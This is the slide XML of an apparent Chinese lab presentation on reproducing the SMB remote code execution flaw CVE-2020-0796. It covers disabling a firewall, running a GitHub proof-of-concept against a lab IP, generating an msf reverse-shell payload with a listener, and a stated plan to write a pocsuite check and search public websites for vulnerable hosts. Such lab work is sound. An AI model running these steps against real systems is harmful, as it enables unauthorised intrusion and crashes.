            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" tIns="36195" bIns="36195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根据复现过程，使用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pocsuite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撰写对应的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poc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，并尝试在公网寻找有相关漏洞的网站，进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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poc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验证。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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28" name="1111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10346690" y="2150110"/>
            <a:ext cx="1562100" cy="1416050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" tIns="36195" bIns="36195" anchor="t">
            <a:noAutofit/>
          </a:bodyPr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分析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实验中的问题，尝试寻找原因，并进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626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实验总结。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626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2052" y="202518"/>
            <a:ext cx="7282469" cy="803936"/>
            <a:chOff x="2602052" y="202518"/>
            <a:chExt cx="7282469" cy="803936"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形: 圆角 3"/>
            <p:cNvSpPr/>
            <p:nvPr/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96386" y="417310"/>
              <a:ext cx="7088135" cy="2768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           </a:t>
              </a:r>
              <a:r>
                <a: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SMB远程代码执行漏洞</a:t>
              </a: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  </a:t>
              </a:r>
              <a:r>
                <a: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（</a:t>
              </a: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CVE-2020-0796</a:t>
              </a:r>
              <a:r>
                <a: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）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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="任意多边形: 形状 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830507" y="1259466"/>
            <a:ext cx="462357" cy="44092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1407377" y="1356543"/>
            <a:ext cx="2295205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漏洞信息收集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0580" y="2296160"/>
            <a:ext cx="4064000" cy="30467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2020年3月，微软公布SMB远程代码执行漏洞（CVE-2020-0796）又称“永恒之黑”，该漏洞由SMB 3.1.1协议中处理压缩消息时，对其中数据没有经过安全检查，没有检查长度是否合法，最终导致整数溢出，直接使用会引发内存破坏漏洞，可能被攻击者利用远程执行任意代码，攻击者利用该漏洞无须权限即可实现远程代码执行，受黑客攻击的目标系统只需开机在线即可能被入侵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0580" y="1814195"/>
            <a:ext cx="110236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漏洞描述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920105" y="2296160"/>
            <a:ext cx="5989955" cy="2493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Windows 10 Version 1903 for 32-bit Systems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Windows 10 Version 1903 for x64-based Systems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Windows 10 Version 1903 for ARM64-based Systems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Windows Server, Version 1903 (Server Core installation)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Windows 10 Version 1909 for 32-bit Systems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Windows 10 Version 1909 for x64-based Systems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Windows 10 Version 1909 for ARM64-based Systems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Windows Server, Version 1909 (Server Core installation)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0105" y="1814195"/>
            <a:ext cx="1102360" cy="3683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影响版本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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2052" y="202518"/>
            <a:ext cx="7282469" cy="803936"/>
            <a:chOff x="2602052" y="202518"/>
            <a:chExt cx="7282469" cy="803936"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形: 圆角 3"/>
            <p:cNvSpPr/>
            <p:nvPr/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96386" y="417310"/>
              <a:ext cx="7088135" cy="2768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           </a:t>
              </a:r>
              <a:r>
                <a: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SMB远程代码执行漏洞</a:t>
              </a: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  </a:t>
              </a:r>
              <a:r>
                <a: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（</a:t>
              </a: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CVE-2020-0796</a:t>
              </a:r>
              <a:r>
                <a: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）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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形: 剪去单角 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3994150" y="-1284605"/>
            <a:ext cx="4204970" cy="10922000"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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文"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137285" y="2370138"/>
            <a:ext cx="9918700" cy="33178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just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="13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根据需要可酌情增减文字，以便观者准确地理解您传达的思想</a:t>
            </a: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  <a:p>
            <a:pPr indent="0" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="13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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 12" descr="屏幕截图 2024-07-19 12580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18795"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003935" y="2208848"/>
            <a:ext cx="5273040" cy="3909695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 15" descr="屏幕截图 2024-07-19 1303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52235" y="2257425"/>
            <a:ext cx="4727575" cy="390398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003935" y="1448435"/>
            <a:ext cx="6232525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首先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我们关闭防火墙：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设置--&gt;更新和安全--&gt;Windows安全中心--&gt;防火墙和网络保护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4" name="任意多边形: 形状 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830507" y="1008006"/>
            <a:ext cx="462357" cy="44092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1407377" y="1100003"/>
            <a:ext cx="2295205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环境搭建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2052" y="202518"/>
            <a:ext cx="7282469" cy="803936"/>
            <a:chOff x="2602052" y="202518"/>
            <a:chExt cx="7282469" cy="803936"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形: 圆角 3"/>
            <p:cNvSpPr/>
            <p:nvPr/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96386" y="417310"/>
              <a:ext cx="7088135" cy="2768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           </a:t>
              </a:r>
              <a:r>
                <a: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SMB远程代码执行漏洞</a:t>
              </a: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  </a:t>
              </a:r>
              <a:r>
                <a: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（</a:t>
              </a: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CVE-2020-0796</a:t>
              </a:r>
              <a:r>
                <a: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）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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形: 剪去单角 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3862070" y="-1336040"/>
            <a:ext cx="4469765" cy="10922000"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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正文"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137285" y="2370138"/>
            <a:ext cx="9918700" cy="33178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just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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1012825" y="1337310"/>
            <a:ext cx="40640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然后我们再通过靶机与操作机互ping检查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14" name="图片 14" descr="屏幕截图 2024-07-19 1259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6465" y="2009458"/>
            <a:ext cx="5269230" cy="157797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926465" y="3765550"/>
            <a:ext cx="4064000" cy="2493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由此可以继续进行操作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我们利用github中下载的工具进行蓝屏测试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下载完成后放入kali虚拟机中，执行以下命令：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unzip CVE-2020-0796-PoC-master.zip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cd CVE-2020-0796-PoC-master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 ./CVE-2020-0796.py 靶机IP地址 可以通过nmap进行扫描，找出我们的靶机ip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6565265" y="1198880"/>
            <a:ext cx="4064000" cy="5537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我们发现靶机是192.168.188.139，进行漏洞复现</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="18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19" name="图片 19" descr="屏幕截图 2024-07-19 13080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289358" y="2009458"/>
            <a:ext cx="5268595" cy="528955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 16" descr="屏幕截图 2024-07-19 1309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400165" y="2603183"/>
            <a:ext cx="5262880" cy="2107565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="任意多边形: 形状 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464112" y="1199776"/>
            <a:ext cx="462357" cy="44092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02052" y="202518"/>
            <a:ext cx="7282469" cy="803936"/>
            <a:chOff x="2602052" y="202518"/>
            <a:chExt cx="7282469" cy="803936"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形: 圆角 3"/>
            <p:cNvSpPr/>
            <p:nvPr/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96386" y="417310"/>
              <a:ext cx="7088135" cy="27686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           </a:t>
              </a:r>
              <a:r>
                <a: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SMB远程代码执行漏洞</a:t>
              </a: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  </a:t>
              </a:r>
              <a:r>
                <a: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（</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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CVE-2020-0796</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1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华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                  <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                  <a:sym typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>）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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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926465" y="3765550"/>
            <a:ext cx="4064000" cy="24930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由此可以继续进行操作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我们利用github中下载的工具进行蓝屏测试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下载完成后放入kali虚拟机中，执行以下命令：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unzip CVE-2020-0796-PoC-master.zip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cd CVE-2020-0796-PoC-master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 ./CVE-2020-0796.py 靶机IP地址 可以通过nmap进行扫描，找出我们的靶机ip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7" name="任意多边形: 形状 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464112" y="1006736"/>
            <a:ext cx="462357" cy="44092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矩形: 剪去单角 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3994150" y="-1431925"/>
            <a:ext cx="4204970" cy="10922000"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect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en-US" altLang="zh-CN" sz="1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" name="图片 20" descr="屏幕截图 2024-07-19 13230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58228" y="1999298"/>
            <a:ext cx="5272405" cy="221805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1058545" y="4400550"/>
            <a:ext cx="503682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进行特定的替换后，生成最终的exploit.py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1058545" y="4860290"/>
            <a:ext cx="4064000" cy="27686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之后再重新打开窗口配置msf并进行监听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pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 25" descr="屏幕截图 2024-07-20 22050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058228" y="5137150"/>
            <a:ext cx="5272405" cy="1341120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 28" descr="屏幕截图 2024-07-19 17394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667500" y="1999298"/>
            <a:ext cx="5267960" cy="1500505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 29" descr="屏幕截图 2024-07-19 17404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667183" y="3587433"/>
            <a:ext cx="5271135" cy="2619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57910" y="1042670"/>
            <a:ext cx="8086090" cy="314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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a: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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用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cs typeface="+mj-cs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955040" y="1330325"/>
            <a:ext cx="6484620" cy="4864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从github进行基础工具的下载，将基础工具解压后，进入目录 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接下来使用msf生成exp的反弹shell，及payload文件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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830507" y="1259466"/>
            <a:ext cx="462357" cy="440925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  <a:gd name="T50" fmla="*/ 121763 h 600884"/>
              <a:gd name="T51" fmla="*/ 121763 h 600884"/>
              <a:gd name="T52" fmla="*/ 121763 h 600884"/>
              <a:gd name="T53" fmla="*/ 121763 h 600884"/>
              <a:gd name="T54" fmla="*/ 121763 h 600884"/>
              <a:gd name="T55" fmla="*/ 121763 h 600884"/>
              <a:gd name="T56" fmla="*/ 121763 h 600884"/>
              <a:gd name="T57" fmla="*/ 121763 h 600884"/>
              <a:gd name="T58" fmla="*/ 121763 h 600884"/>
              <a:gd name="T59" fmla="*/ 121763 h 600884"/>
              <a:gd name="T60" fmla="*/ 121763 h 600884"/>
              <a:gd name="T61" fmla="*/ 121763 h 600884"/>
              <a:gd name="T62" fmla="*/ 121763 h 600884"/>
              <a:gd name="T63" fmla="*/ 121763 h 600884"/>
              <a:gd name="T64" fmla="*/ 121763 h 600884"/>
              <a:gd name="T65" fmla="*/ 121763 h 600884"/>
              <a:gd name="T66" fmla="*/ 121763 h 600884"/>
              <a:gd name="T67" fmla="*/ 121763 h 600884"/>
              <a:gd name="T68" fmla="*/ 121763 h 600884"/>
              <a:gd name="T69" fmla="*/ 121763 h 600884"/>
              <a:gd name="T70" fmla="*/ 121763 h 600884"/>
              <a:gd name="T71" fmla="*/ 121763 h 600884"/>
              <a:gd name="T72" fmla="*/ 121763 h 600884"/>
              <a:gd name="T73" fmla="*/ 121763 h 600884"/>
              <a:gd name="T74" fmla="*/ 121763 h 600884"/>
              <a:gd name="T75" fmla="*/ 121763 h 600884"/>
              <a:gd name="T76" fmla="*/ 121763 h 600884"/>
              <a:gd name="T77" fmla="*/ 121763 h 600884"/>
              <a:gd name="T78" fmla="*/ 121763 h 600884"/>
              <a:gd name="T7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200" h="5200">
                <a:moveTo>
                  <a:pt x="2600" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1164" y="0"/>
                  <a:pt x="0" y="1164"/>
                  <a:pt x="0" y="2600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="4036"/>
                  <a:pt x="1164" y="5200"/>
                  <a:pt x="2600" y="5200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4036" y="5200"/>
                  <a:pt x="5200" y="4036"/>
                  <a:pt x="5200" y="2600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5200" y="1164"/>
                  <a:pt x="4036" y="0"/>
                  <a:pt x="2600" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1594" y="609"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1547" y="674"/>
                  <a:pt x="1502" y="743"/>
                  <a:pt x="1460" y="817"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1396" y="930"/>
                  <a:pt x="1338" y="1052"/>
                  <a:pt x="1288" y="1181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1180" y="1152"/>
                  <a:pt x="1073" y="1119"/>
                  <a:pt x="967" y="1082"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1145" y="890"/>
                  <a:pt x="1358" y="729"/>
                  <a:pt x="1594" y="609"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="697" y="1436"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="850" y="1493"/>
                  <a:pt x="1004" y="1543"/>
                  <a:pt x="1159" y="1586"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1095" y="1839"/>
                  <a:pt x="1055" y="2109"/>
                  <a:pt x="1042" y="2388"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="379" y="2388"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="412" y="2041"/>
                  <a:pt x="524" y="1718"/>
                  <a:pt x="697" y="1436"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="697" y="3764"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="524" y="3482"/>
                  <a:pt x="412" y="3159"/>
                  <a:pt x="379" y="2812"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1042" y="2812"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1055" y="3091"/>
                  <a:pt x="1095" y="3361"/>
                  <a:pt x="1159" y="3614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1004" y="3657"/>
                  <a:pt x="850" y="3707"/>
                  <a:pt x="697" y="3764"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="967" y="4118"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1073" y="4081"/>
                  <a:pt x="1180" y="4048"/>
                  <a:pt x="1288" y="4019"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1338" y="4148"/>
                  <a:pt x="1396" y="4270"/>
                  <a:pt x="1460" y="4383"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1502" y="4457"/>
                  <a:pt x="1547" y="4526"/>
                  <a:pt x="1594" y="4591"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1358" y="4471"/>
                  <a:pt x="1145" y="4310"/>
                  <a:pt x="967" y="4118"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2388" y="4721"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2116" y="4619"/>
                  <a:pt x="1875" y="4326"/>
                  <a:pt x="1707" y="3922"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1933" y="3881"/>
                  <a:pt x="2160" y="3855"/>
                  <a:pt x="2388" y="3845"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2388" y="4721"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2388" y="3419"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2115" y="3430"/>
                  <a:pt x="1843" y="3462"/>
                  <a:pt x="1573" y="3515"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1517" y="3297"/>
                  <a:pt x="1481" y="3060"/>
                  <a:pt x="1467" y="2812"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2388" y="2812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2388" y="3419"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2388" y="2388"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1467" y="2388"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1481" y="2140"/>
                  <a:pt x="1517" y="1903"/>
                  <a:pt x="1573" y="1685"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1843" y="1738"/>
                  <a:pt x="2115" y="1770"/>
                  <a:pt x="2388" y="1781"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2388" y="2388"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2388" y="1355"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2160" y="1345"/>
                  <a:pt x="1933" y="1319"/>
                  <a:pt x="1707" y="1278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1875" y="874"/>
                  <a:pt x="2116" y="581"/>
                  <a:pt x="2388" y="479"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2388" y="1355"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4503" y="1436"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4676" y="1718"/>
                  <a:pt x="4788" y="2041"/>
                  <a:pt x="4821" y="2388"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4158" y="2388"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4145" y="2109"/>
                  <a:pt x="4105" y="1839"/>
                  <a:pt x="4041" y="1587"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4196" y="1543"/>
                  <a:pt x="4350" y="1493"/>
                  <a:pt x="4503" y="1436"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4233" y="1082"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4127" y="1119"/>
                  <a:pt x="4020" y="1152"/>
                  <a:pt x="3912" y="1181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3862" y="1052"/>
                  <a:pt x="3804" y="930"/>
                  <a:pt x="3740" y="817"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3698" y="743"/>
                  <a:pt x="3653" y="674"/>
                  <a:pt x="3606" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3843" y="729"/>
                  <a:pt x="4055" y="890"/>
                  <a:pt x="4233" y="1082"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2812" y="479"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3084" y="581"/>
                  <a:pt x="3325" y="874"/>
                  <a:pt x="3493" y="1278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3267" y="1319"/>
                  <a:pt x="3040" y="1345"/>
                  <a:pt x="2812" y="1355"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2812" y="479"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2812" y="1781"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3085" y="1770"/>
                  <a:pt x="3357" y="1738"/>
                  <a:pt x="3627" y="1685"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3683" y="1903"/>
                  <a:pt x="3719" y="2140"/>
                  <a:pt x="3733" y="2388"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2812" y="2388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2812" y="1781"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2812" y="2812"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3733" y="2812"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3719" y="3060"/>
                  <a:pt x="3683" y="3297"/>
                  <a:pt x="3627" y="3515"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3357" y="3462"/>
                  <a:pt x="3085" y="3430"/>
                  <a:pt x="2812" y="3419"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2812" y="2812"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2812" y="4721"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2812" y="3845"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3040" y="3855"/>
                  <a:pt x="3267" y="3881"/>
                  <a:pt x="3493" y="3922"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3325" y="4326"/>
                  <a:pt x="3084" y="4619"/>
                  <a:pt x="2812" y="4721"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3606" y="4591"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3653" y="4526"/>
                  <a:pt x="3698" y="4457"/>
                  <a:pt x="3740" y="4383"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3804" y="4270"/>
                  <a:pt x="3862" y="4148"/>
                  <a:pt x="3912" y="4019"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4020" y="4048"/>
                  <a:pt x="4127" y="4081"/>
                  <a:pt x="4233" y="4118"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4055" y="4310"/>
                  <a:pt x="3843" y="4471"/>
                  <a:pt x="3606" y="4591"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4503" y="3764"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4350" y="3707"/>
                  <a:pt x="4196" y="3657"/>
                  <a:pt x="4041" y="3613"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4105" y="3361"/>
                  <a:pt x="4145" y="3091"/>
                  <a:pt x="4158" y="2812"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4821" y="2812"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4788" y="3159"/>
                  <a:pt x="4676" y="3482"/>
                  <a:pt x="4503" y="376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任意多边形: 形状 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830507" y="5114187"/>
            <a:ext cx="430087" cy="484347"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY0" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX1" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY1" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX2" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY2" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX3" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY3" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX4" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY4" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX5" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY5" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX6" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY6" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX7" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY7" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX8" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY8" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX9" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY9" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX10" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY10" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX11" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY11" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX12" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY12" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX13" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY13" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX14" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY14" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX15" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY15" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX16" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY16" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX17" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY17" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX18" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY18" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteX19" fmla="*/ 121763 h 600884"/>
              <a:gd name="connsiteY19" fmla="*/ 121763 h 600884"/>
